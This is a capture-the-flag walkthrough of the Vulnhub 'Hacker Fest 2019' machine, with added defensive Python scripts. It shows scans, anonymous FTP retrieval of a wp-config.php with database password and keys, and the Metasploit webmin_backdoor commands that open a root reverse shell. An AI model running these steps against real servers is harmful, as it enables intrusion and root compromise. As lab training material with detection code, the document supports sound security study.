
Vulnhub HF 2019 target machine: detailed test walkthrough

Posted: 2023-04-22 09:46:29, views: 40
Tags: ftp rw -- 2019 Vulnhub wp php HF

HF 2019

Author: jason huawen

Target machine information

Name: Hacker Fest: 2019

Address:

https://www.vulnhub.com/entry/hacker-fest-2019,378/

Identifying the target host's IP address

Import the VM image into VirtualBox, set the network mode to host-only, then start Kali Linux and the target host (VM):

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:69:f3:d5      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:47:72:31      1      60  PCS Systemtechnik GmbH             

Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.254.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-21 20:25 EDT
Nmap scan report for inplainsight (192.168.56.254)
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
| -rw-rw-r--    1 ftp      ftp         19935 Sep 05  2019 license.txt
| -rw-rw-r--    1 ftp      ftp          7447 Sep 05  2019 readme.html
| -rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
| drwxrwxr-x    9 ftp      ftp          4096 Sep 05  2019 wp-admin
| -rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
| -rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
| -rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
| drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
| -rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
| drwxrwxr-x   20 ftp      ftp         12288 Sep 05  2019 wp-includes
| -rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
| -rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
| -rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
| -rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
| -rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
| -rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
| -rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
|_-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b72e8fcb12e4e8cd931e730f51ce486c (RSA)
|   256 70f444eba85554382d6d7589bbec7ee7 (ECDSA)
|_  256 7c0eabfe537e8722f85adfc9da7f9079 (ED25519)
80/tcp    open  http     Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-generator: WordPress 5.2.3
|_http-title: Tata intranet – Just another WordPress site
10000/tcp open  ssl/http MiniServ 1.890 (Webmin httpd)
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Linux-Debian
| Not valid before: 2019-09-09T13:32:42
|_Not valid after:  2024-09-07T13:32:42
|_http-title: Login to Webmin
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:47:72:31 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.08 seconds

The NMAP scan results show that the target host has 4 open ports: 21 (ftp), 22 (ssh), 80 (http) and 10000 (https).

Getting a shell

First gather some basic information, starting with the FTP service:

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||41051|)
150 Here comes the directory listing.
drwxrwxr-x    5 ftp      ftp          4096 Sep 27  2019 .
drwxrwxr-x    5 ftp      ftp          4096 Sep 27  2019 ..
-rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
-rw-rw-r--    1 ftp      ftp         19935 Sep 05  2019 license.txt
-rw-rw-r--    1 ftp      ftp          7447 Sep 05  2019 readme.html
-rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
drwxrwxr-x    9 ftp      ftp          4096 Sep 05  2019 wp-admin
-rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
-rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
-rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
-rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
drwxrwxr-x   20 ftp      ftp         12288 Sep 05  2019 wp-includes
-rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
-rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
-rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
-rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
-rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
-rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
-rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> get wp-config.php
local: wp-config.php remote: wp-config.php
229 Entering Extended Passive Mode (|||40504|)
150 Opening BINARY mode data connection for wp-config.php (3255 bytes).
100% |********************************************************************************|  3255        5.44 MiB/s    00:00 ETA
226 Transfer complete.
3255 bytes received in 00:00 (3.38 MiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||47153|)
150 Here comes the directory listing.
-rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
-rw-rw-r--    1 ftp      ftp         19935 Sep 05  2019 license.txt
-rw-rw-r--    1 ftp      ftp          7447 Sep 05  2019 readme.html
-rw-rw-r--    1 ftp      ftp          6919 Jan 12  2019 wp-activate.php
drwxrwxr-x    9 ftp      ftp          4096 Sep 05  2019 wp-admin
-rw-rw-r--    1 ftp      ftp           369 Nov 30  2017 wp-blog-header.php
-rw-rw-r--    1 ftp      ftp          2283 Jan 21  2019 wp-comments-post.php
-rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
-rw-rw-r--    1 ftp      ftp          3847 Jan 09  2019 wp-cron.php
drwxrwxr-x   20 ftp      ftp         12288 Sep 05  2019 wp-includes
-rw-rw-r--    1 ftp      ftp          2502 Jan 16  2019 wp-links-opml.php
-rw-rw-r--    1 ftp      ftp          3306 Nov 30  2017 wp-load.php
-rw-rw-r--    1 ftp      ftp         39551 Jun 10  2019 wp-login.php
-rw-rw-r--    1 ftp      ftp          8403 Nov 30  2017 wp-mail.php
-rw-rw-r--    1 ftp      ftp         18962 Mar 28  2019 wp-settings.php
-rw-rw-r--    1 ftp      ftp         31085 Jan 16  2019 wp-signup.php
-rw-rw-r--    1 ftp      ftp          4764 Nov 30  2017 wp-trackback.php
-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
226 Directory send OK.
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ cat wp-config.php 
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'nvwtlRqkD0E1jBXu' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_SITEURL', 'http://' . $_SERVER['HTTP_HOST'] );
define( 'WP_HTTP_BLOCK_EXTERNAL', true);

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'pRK.Kp  Z1DM=j~5N.codyXo[zrg310jxWz x1}{LnIo~n2Et7-46XB:;aYFmuws' );
define( 'SECURE_AUTH_KEY',  'W#}%dnp@K[6cvP{O[:^P?IqI2I=zXhd.6|8tL>%xvY$bJPUg<)y=,)h$!su?Kta,' );
define( 'LOGGED_IN_KEY',    'gMwj,):PF(X,Ue355zuQa!E#]El]M%>K}`!eRJAPtEfB>o!cBoV#9EM,XzuB1-fy' );
define( 'NONCE_KEY',        '=!e++=KhEw8q:M;9(oi(^e:ie@]X&g#&x/bRYUU^:}n$]?`TA2IWB5}O$IV:5IVo' );
define( 'AUTH_SALT',        '%%)9qf/&oa16?5~:)hGAvLSEd{G{u)<gJ4z~A0#cqq=|Qhv1K0qPqMVI8DfA+i=L' );
define( 'SECURE_AUTH_SALT', ']FH<<oPh6f31fTb7z3s532!qGAqiSe<>bOq >vHpCxqBBj-Z&`YFRM}9N`>HwfNp' );
define( 'LOGGED_IN_SALT',   '.k0,KD{$=yHnqV6WRec1_%HUl~hI1,%ZT4$SjV]%`kN4/,(Aq#]%98-?d6q/86ID' );
define( 'NONCE_SALT',       'IVrbtg_|bteQ~1=~p[WQN+DdlL!t#/LT09?F?nX!Kuo,/zA*;%myD/m NIxhgP p' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

                                                        

The main results of the information gathering against the FTP service are:

  1. The target host's FTP service allows anonymous access

  2. The FTP service version has no exploitable vulnerability

  3. The anonymous user cannot change directory

  4. The anonymous user is not allowed to upload files

  5. wp-config.php was downloaded from the FTP directory to the local machine; it contains the database username and password:

username: wordpress

password: nvwtlRqkD0E1jBXu

However, since the target host does not expose the MySQL service, the database cannot be reached from Kali Linux.
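The exposure above is really two findings: a web root published through anonymous FTP, and a configuration file that hands out database credentials and the WordPress authentication keys. The following Python script is an added example (not part of the original walkthrough) that parses a directory listing in the `ls -l` format vsftpd returns, reports sensitive files the anonymous `ftp` account can read and files it could modify if the server permitted writes, and lists which secret-bearing constants a leaked wp-config.php contains. The listing and the wp-config.php excerpt are constructed samples (all values are placeholders, not the machine's); `SENSITIVE_NAMES` and the `ftp` account name are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: rows in the `ls -l` format vsftpd returns for an
# anonymous session (same shape as the walkthrough's listing, not a copy of it).
SAMPLE_LISTING = """\
drwxrwxr-x    5 ftp      ftp          4096 Sep 27  2019 .
-rw-rw-r--    1 ftp      ftp           420 Nov 30  2017 index.php
-rw-rw-r--    1 ftp      ftp          3255 Sep 27  2019 wp-config.php
drwxrwxr-x    8 ftp      ftp          4096 Sep 29  2019 wp-content
-rw-rw-r--    1 ftp      ftp          3068 Aug 17  2018 xmlrpc.php
"""

# Constructed wp-config.php excerpt; every value is a placeholder.
SAMPLE_WPCONFIG = """\
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'PLACEHOLDER-NOT-A-REAL-PASSWORD' );
define( 'DB_HOST', 'localhost' );
define( 'AUTH_KEY',         'PLACEHOLDER-KEY' );
define( 'WP_HOME', 'http://' . $_SERVER['HTTP_HOST'] );
"""

# Assumption: files that must never be reachable from an anonymous FTP root.
SENSITIVE_NAMES = {"wp-config.php", ".htpasswd", ".env", "id_rsa", "config.php"}
# WordPress constants whose values are secrets.
SECRET_KEYS = {"DB_PASSWORD", "AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
               "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT"}

LISTING_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\w{3}\s+\d{1,2}\s+[\d:]+\s+(?P<name>.+)$"
)
DEFINE_RE = re.compile(r"define\(\s*'(?P<key>[A-Z_]+)'\s*,\s*'(?P<val>[^']*)'\s*\)")


@dataclass
class Entry:
    mode: str
    owner: str
    group: str
    size: int
    name: str

    @property
    def is_dir(self) -> bool:
        return self.mode[0] == "d"

    def accessible_by(self, user: str, perm: str) -> bool:
        """Whether `user` (as owner, group member or other) has r/w/x on this entry."""
        offset = "rwx".index(perm)
        if self.owner == user:
            idx = 1 + offset
        elif self.group == user:
            idx = 4 + offset
        else:
            idx = 7 + offset
        return self.mode[idx] != "-"


def parse_listing(text: str) -> list[Entry]:
    """Parse `ls -l` style lines; lines that do not look like entries are ignored."""
    entries = []
    for line in text.splitlines():
        m = LISTING_RE.match(line)
        if m:
            entries.append(Entry(m["mode"], m["owner"], m["group"], int(m["size"]), m["name"]))
    return entries


def audit_listing(text: str, ftp_user: str = "ftp") -> list[tuple[str, str]]:
    """Findings as (issue, file name) for what the anonymous account can reach."""
    findings = []
    for e in parse_listing(text):
        if e.name in (".", ".."):
            continue
        if e.name in SENSITIVE_NAMES and e.accessible_by(ftp_user, "r"):
            findings.append(("sensitive-readable", e.name))
        # Write bits matter even when the server currently refuses uploads:
        # one config change (write_enable) turns them into site defacement.
        if not e.is_dir and e.accessible_by(ftp_user, "w"):
            findings.append(("writable-by-ftp-account", e.name))
    return findings


def exposed_secrets(wp_config: str) -> list[str]:
    """Names of secret-bearing constants a leaked wp-config.php would hand out."""
    return [m["key"] for m in DEFINE_RE.finditer(wp_config) if m["key"] in SECRET_KEYS]


if __name__ == "__main__":
    for issue, name in audit_listing(SAMPLE_LISTING):
        print(f"{issue}: {name}")
    print("secrets in wp-config.php:", ", ".join(exposed_secrets(SAMPLE_WPCONFIG)))
```

Permission bits are necessary but not sufficient here: in vsftpd the `write_enable` and `anon_upload_enable` settings decide whether the ftp account may write at all, which is why the walkthrough found uploads refused even though every file is mode rw for its ftp owner. The fix is the same either way: keep the web root out of the anonymous FTP root (or disable anonymous login entirely), and rotate the database password and the authentication keys once a wp-config.php has been exposed.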

Opening port 80 in a browser on Kali Linux shows that the target site is a WordPress site.

┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ wpscan --url http://192.168.56.254 -e u,p --random-user-agent
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]

Scan Aborted: The target is responding with a 403, this might be due to a WAF. Well... --random-user-agent didn't work, use --force to skip this check if needed.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/HF2019]
└─$ wpscan --url http://192.168.56.254 -e u,p --random-user-agent --force
_______________________________________________________________

Judging from the output, the target site sits behind a firewall (WAF) and cannot be scanned.

Since port 80 looks difficult, turn to the other open port, 10000. The service there is Webmin; an internet search shows it has a known vulnerability, and it can be exploited directly with the Metasploit tool:

msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > show options 

Module options (exploit/linux/http/webmin_backdoor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                         ing-metasploit.html
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loca
                                       l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/webmin_backdoor) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(linux/http/webmin_backdoor) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(linux/http/webmin_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS 192.168.56.254
RHOSTS => 192.168.56.254
msf6 exploit(linux/http/webmin_backdoor) > set SSL true 
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_backdoor) > set RPORT 10000
RPORT => 10000
msf6 exploit(linux/http/webmin_backdoor) > run

[*] Started reverse TCP handler on 192.168.56.206:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.56.206:5555 -> 192.168.56.254:55480) at 2023-04-21 20:47:44 -0400

A shell on the target host has been obtained successfully.

Moreover, it is a root shell straight away, so the root flag is obtained easily:

ls /root
flag.txt
cat /root/flag.txt
3dcdf93d2976321d7a8c47a6bb2d48837d330624
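Because Webmin on this machine runs as root, the shell Metasploit opened is root as well, so the session line above (`192.168.56.206:5555 -> 192.168.56.254:55480`) is a full host compromise. The following Python script is an added example, not part of the original post, of detection logic for that kind of session on the host side. It parses `ss -tnp`-style output (constructed sample lines; the addresses mirror this lab, the pids and fds are invented) and flags a shell whose stdin/stdout/stderr are a socket, which is what a cmd/unix reverse shell looks like locally, and, as a weaker second signal, an interpreter holding a connection the host itself initiated. The listening-port set comes from the nmap scan; `miniserv.pl` as Webmin's process name and the interpreter list are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed `ss -tnp` style output: State Recv-Q Send-Q Local Peer Process.
# Third line is the shape a perl reverse shell leaves: the spawned sh has
# fds 0/1/2 on the socket, perl still holds its own fd.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port      Peer Address:Port      Process
ESTAB  0      0      192.168.56.254:10000    192.168.56.206:44210   users:(("miniserv.pl",pid=612,fd=7))
ESTAB  0      0      192.168.56.254:22       192.168.56.1:50112     users:(("sshd",pid=905,fd=4))
ESTAB  0      0      192.168.56.254:55480    192.168.56.206:5555    users:(("sh",pid=1341,fd=2),("sh",pid=1341,fd=1),("sh",pid=1341,fd=0),("perl",pid=1340,fd=3))
ESTAB  0      0      127.0.0.1:3306          127.0.0.1:41002        users:(("mysqld",pid=480,fd=30))
ESTAB  0      0      192.168.56.254:39882    203.0.113.10:443       users:(("curl",pid=2001,fd=5))
ESTAB  0      0      192.168.56.254:40010    203.0.113.20:8080      users:(("python3",pid=2100,fd=3))
"""

SHELLS = {"sh", "bash", "dash", "zsh"}
# Assumption: programs that have no business initiating connections from a web server.
INTERPRETERS = {"perl", "python", "python3", "php", "ruby", "nc", "ncat", "socat"} | SHELLS
# Ports this host legitimately serves (from the nmap scan plus local MySQL).
LISTENING_PORTS = {21, 22, 80, 10000, 3306}

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')


@dataclass
class Conn:
    state: str
    local_ip: str
    local_port: int
    peer_ip: str
    peer_port: int
    procs: list[tuple[str, int, int]]  # (name, pid, fd)


def parse_ss(text: str) -> list[Conn]:
    """Parse `ss -tnp` lines; the header and malformed lines are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5 or parts[0] == "State":
            continue
        state, _rq, _sq, local, peer = parts[:5]
        proc_field = parts[5] if len(parts) > 5 else ""
        lip, lport = local.rsplit(":", 1)
        pip, pport = peer.rsplit(":", 1)
        procs = [(n, int(p), int(f)) for n, p, f in PROC_RE.findall(proc_field)]
        conns.append(Conn(state, lip, int(lport), pip, int(pport), procs))
    return conns


def suspicious(conns: list[Conn], listening_ports: set[int] = LISTENING_PORTS) -> list[tuple[str, str, int]]:
    """Return (rule, peer ip, peer port) for connections that look like a shell or staged payload."""
    findings = []
    for c in conns:
        if c.state != "ESTAB":
            continue
        names = {n for n, _, _ in c.procs}
        # Rule 1: a shell whose stdio is a socket. Legitimate software never does this.
        if any(n in SHELLS and fd in (0, 1, 2) for n, _, fd in c.procs):
            findings.append(("shell-stdio-on-socket", c.peer_ip, c.peer_port))
        # Rule 2: the local port is not one we serve, so this host initiated the
        # connection, and an interpreter owns it.
        elif c.local_port not in listening_ports and names & INTERPRETERS:
            findings.append(("interpreter-outbound", c.peer_ip, c.peer_port))
    return findings


if __name__ == "__main__":
    for rule, ip, port in suspicious(parse_ss(SAMPLE_SS)):
        print(f"{rule}: {ip}:{port}")
```

Rule 1 alone has very few false positives and is worth alerting on from a cron job or an EDR query; rule 2 needs tuning for hosts whose applications legitimately make outbound calls. In either case the response here is host rebuild, not a single-service fix: Webmin ran as root, so nothing on the machine can be trusted afterwards.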

From: https://www.cnblogs.com/jason-huawen/p/17342471.html
